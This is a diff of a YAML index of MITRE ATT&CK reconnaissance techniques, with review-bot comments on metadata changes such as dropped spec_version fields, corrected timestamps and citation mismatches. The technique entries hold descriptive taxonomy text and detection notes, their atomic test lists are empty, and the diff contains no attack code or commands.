- Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-05-31T04:18:44.568Z'
name: Spearphishing Attachment
description: |-
Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -55498,19 +56148,55 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Philip Winther
+ - Sebastian Salla, McAfee
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
accounts receiving messages from a single unusual/unknown sender. Filtering
based on DKIM+SPF or header analysis can help detect when the email sender
is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+ created: '2020-10-02T17:08:57.386Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1598/002
+ external_id: T1598.002
+ - source_name: ACSC Email Spoofing
+ description: Australian Cyber Security Centre. (2012, December). Mitigating
+ Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: Sophos Attachment
+ description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+ links – when phishers bring along their own web pages. Retrieved October
+ 20, 2020.'
+ url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+ - source_name: Microsoft Anti Spoofing
+ description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+ Retrieved October 19, 2020.
+ url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+ - source_name: GitHub Phishery
+ description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+ 23, 2020.
+ url: https://github.com/ryhanson/phishery
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.004:
technique:
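Review bot: spec_version: '2.1' is removed here and not re-emitted, while x_mitre_attack_spec_version goes from 2.1.0 to 3.2.0 at the end of the object and revoked: false, x_mitre_deprecated: false, x_mitre_domains and x_mitre_platforms are added. If this index is meant to remain a faithful STIX 2.1 projection, spec_version is a required property and should stay; if it is only consumed by the project's own tooling, a sentence in the PR description saying the field was dropped deliberately would save the next reader the question. The ACSC Email Spoofing url switching to a web.archive.org snapshot keeps the same source_name, so the (Citation: ACSC Email Spoofing) in x_mitre_detection still resolves.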
@@ -55533,7 +56219,7 @@ reconnaissance:
description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
You Can Do About It. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:47:55.905Z'
name: CDNs
description: |-
Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
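Review bot: modified moves backwards here, from '2022-04-25T14:00:00.188Z' to '2021-04-15T03:47:55.905Z'. The old value, with its 14:00:00.188Z time, recurs across many entries in this diff, which suggests it was a bulk-assigned timestamp rather than the object's real modification time, so the earlier date is most likely a correction; confirm that the generator now copies modified straight from the upstream object and say so in the PR description, so the regression does not read as stale data.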
@@ -55549,8 +56235,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591:
technique:
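Review bot: for T1596.004 both spec_version: '2.1' and x_mitre_attack_spec_version: 2.1.0 are deleted and neither is re-added, whereas T1598.002 just above gets x_mitre_attack_spec_version: 3.2.0 appended. Presumably the generator emits the field only when the upstream object carries it, but that leaves consumers of this index with entries that have the field and entries that silently lack it; confirm that is intended.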
@@ -55576,7 +56260,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.343Z'
name: Gather Victim Org Information
description: |-
Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -55592,8 +56276,6 @@ reconnaissance:
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590:
technique:
@@ -55621,7 +56303,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:23.229Z'
name: Gather Victim Network Information
description: |-
Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -55637,12 +56319,10 @@ reconnaissance:
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593:
technique:
- modified: '2022-10-18T22:48:33.286Z'
+ modified: '2024-09-12T19:19:47.759Z'
name: Search Open Websites/Domains
description: |-
Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -55651,16 +56331,16 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
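Review bot: this hunk changes no values, only key order (x_mitre_deprecated moves above x_mitre_detection; x_mitre_is_subtechnique and x_mitre_platforms move below x_mitre_domains). YAML key order carries no meaning here, so the churn is purely review cost; if the generator emitted keys in a fixed sorted order, future regenerations would diff on real changes only.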
@@ -55673,8 +56353,8 @@ reconnaissance:
external_id: T1593
- source_name: SecurityTrails Google Hacking
description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- url: https://securitytrails.com/blog/google-hacking-techniques
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
- source_name: Cyware Social Media
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
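Review bot: the rewritten SecurityTrails Google Hacking reference keeps source_name 'SecurityTrails Google Hacking' and the description 'Borges, E. (2019, March 5). Exploring Google Hacking Techniques.' while the url now points at www.recordedfuture.com/.../google-dorks and the retrieval date moves to September 12, 2024. If the new page is a relocated copy of the same article this is fine; otherwise the description and source_name should be updated together with the url so the citation in the T1593 description still matches what it points to.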
@@ -55685,52 +56365,50 @@ reconnaissance:
url: https://www.exploit-db.com/google-hacking-database
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1597:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
- type: attack-pattern
- created: '2020-10-02T17:01:42.558Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1597
- url: https://attack.mitre.org/techniques/T1597
- - source_name: D3Secutrity CTI Feeds
- url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
- description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
- Intelligence Feeds. Retrieved October 20, 2020.
- - source_name: ZDNET Selling Data
- url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
- description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
- 73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-04T13:12:14.469Z'
name: Search Closed Sources
description: |-
- Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+ Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Barbara Louis-Sidney (OWN-CERT)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
+ type: attack-pattern
+ id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+ created: '2020-10-02T17:01:42.558Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1597
+ external_id: T1597
+ - source_name: ZDNET Selling Data
+ description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+ 73 million user records on the dark web. Retrieved October 20, 2020.
+ url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1592.003:
technique:
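Review bot: removing the D3Secutrity CTI Feeds entry from external_references is consistent with the new description, which no longer carries (Citation: D3Secutrity CTI Feeds) after the 'paid subscriptions to feeds of technical/threat intelligence data' sentence; only (Citation: ZDNET Selling Data) remains and its reference entry is kept. The version bump to '1.1', the added contributor and the new revoked: false / x_mitre_deprecated: false keys line up with the other regenerated entries in this diff.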
@@ -55752,7 +56430,7 @@ reconnaissance:
url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
source code and proprietary data dumped online. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:22:46.759Z'
name: Firmware
description: |-
Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -55768,8 +56446,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.002:
technique:
@@ -55795,7 +56471,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:33:19.596Z'
name: Software
description: |-
Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -55813,8 +56489,6 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.001:
technique:
@@ -55836,7 +56510,7 @@ reconnaissance:
url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:52:40.958Z'
name: Social Media
description: |-
Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -55852,12 +56526,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.001:
technique:
- modified: '2023-04-14T23:29:10.396Z'
+ modified: '2024-10-10T13:45:01.069Z'
name: Credentials
description: "Adversaries may gather credentials that can be used during targeting.
Account credentials gathered by adversaries may be those directly associated
@@ -55867,17 +56539,20 @@ reconnaissance:
elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
Adversaries may also compromise sites then add malicious content designed
to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
- Credential information may also be exposed to adversaries via leaks to online
- or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
- breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
- Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
- GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
- may also purchase credentials from dark web or other black-markets. Finally,
- where multi-factor authentication (MFA) based on out-of-band communications
- is in use, adversaries may compromise a service provider to gain access to
- MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
- this information may reveal opportunities for other forms of reconnaissance
- (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+ (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+ Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+ GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+ based on out-of-band communications is in use, adversaries may compromise
+ a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+ Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+ adversaries via leaks to online or other accessible data sets (ex: [Search
+ Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+ repositories, etc.). Adversaries may purchase credentials from dark web markets,
+ such as Russian Market and 2easy, or through access to Telegram channels that
+ distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+ 2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+ Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+ for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
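Review bot: in the reordered description the leak-related citations (Register Deloitte, Register Uber, Detectify Slack Tokens, Forbes GitHub Creds, GitHub truffleHog, GitHub Gitrob, CNET Leaks) now follow the ScanBox sentence about collecting website authentication cookies, while the sentence they previously supported ('Credential information may also be exposed to adversaries via leaks to online or other accessible data sets ...') moves to the next paragraph with no citation at all. If this text is copied verbatim from upstream ATT&CK the mismatch originates there, but it is worth confirming rather than carrying it silently. The three new citations (Bleeping Computer 2easy 2021, SecureWorks Infostealers 2023, Bleeping Computer Stealer Logs 2023) each need a matching external_references entry in this technique.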
@@ -55889,6 +56564,7 @@ reconnaissance:
- Vinayak Wadhwa, Lucideus
- Lee Christensen, SpecterOps
- Toby Kohlenberg
+ - Massimo Giaimo, Würth Group Cyber Defence Center
x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -55899,7 +56575,7 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
created: '2020-10-02T14:55:43.815Z'
@@ -55909,6 +56585,10 @@ reconnaissance:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1589/001
external_id: T1589.001
+ - source_name: Bleeping Computer 2easy 2021
+ description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+ web marketplace for stolen data. Retrieved October 7, 2024.
+ url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
- source_name: ATT ScanBox
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -55921,6 +56601,10 @@ reconnaissance:
description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
19, 2020.
url: https://github.com/dxa4481/truffleHog
+ - source_name: Bleeping Computer Stealer Logs 2023
+ description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+ Stealer Logs in Context. Retrieved October 10, 2024.'
+ url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
- source_name: Register Uber
description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -55943,6 +56627,10 @@ reconnaissance:
Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
October 19, 2020.
url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+ - source_name: SecureWorks Infostealers 2023
+ description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+ The Growing Threat from Infostealers. Retrieved October 10, 2024.
+ url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
- source_name: Register Deloitte
description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -55950,9 +56638,8 @@ reconnaissance:
url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.003:
technique:
@@ -56011,7 +56698,7 @@ reconnaissance:
adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
to access valuable information that can be exfiltrated or used to escalate
privileges and move laterally. "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -56031,7 +56718,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1591.004:
technique:
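Review bot: T1595.003 keeps x_mitre_attack_spec_version: 2.1.0 (unchanged context) and loses only spec_version, so after this change the index carries three states for the attack spec version: 3.2.0, 2.1.0 and absent. Anything that filters or validates on that field should be checked against all three; if the absent case really means 'upstream object has no value', emitting it explicitly would make the index easier to validate.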
@@ -56053,7 +56739,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:39:08.904Z'
name: Identify Roles
description: |-
Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -56069,12 +56755,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598:
technique:
- modified: '2023-09-08T20:28:49.600Z'
+ modified: '2024-05-31T04:18:44.570Z'
name: Phishing for Information
description: "Adversaries may send phishing messages to elicit sensitive information
that can be used during targeting. Phishing for information is an attempt
@@ -56143,7 +56827,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Avertium callback phishing
description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
PHISHING. Retrieved February 2, 2023.
@@ -56191,31 +56875,12 @@ reconnaissance:
url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.001:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
- type: attack-pattern
- created: '2020-10-02T16:54:23.193Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1595.001
- url: https://attack.mitre.org/techniques/T1595/001
- - source_name: Botnet Scan
- url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
- description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
- a Botnet. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:46:55.039Z'
name: Scanning IP Blocks
description: |-
Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -56224,19 +56889,41 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Diego Sappa, Securonix
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+ created: '2020-10-02T16:54:23.193Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1595/001
+ external_id: T1595.001
+ - source_name: Botnet Scan
+ description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+ a Botnet. Retrieved October 20, 2020.
+ url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1590.001:
technique:
@@ -56294,7 +56981,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.005:
technique:
@@ -56315,7 +57001,7 @@ reconnaissance:
- source_name: Shodan
url: https://shodan.io
description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:49.260Z'
name: Scan Databases
description: |-
Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -56331,8 +57017,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.001:
technique:
@@ -56358,7 +57042,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.025Z'
name: Determine Physical Locations
description: |-
Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -56374,8 +57058,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.001:
technique:
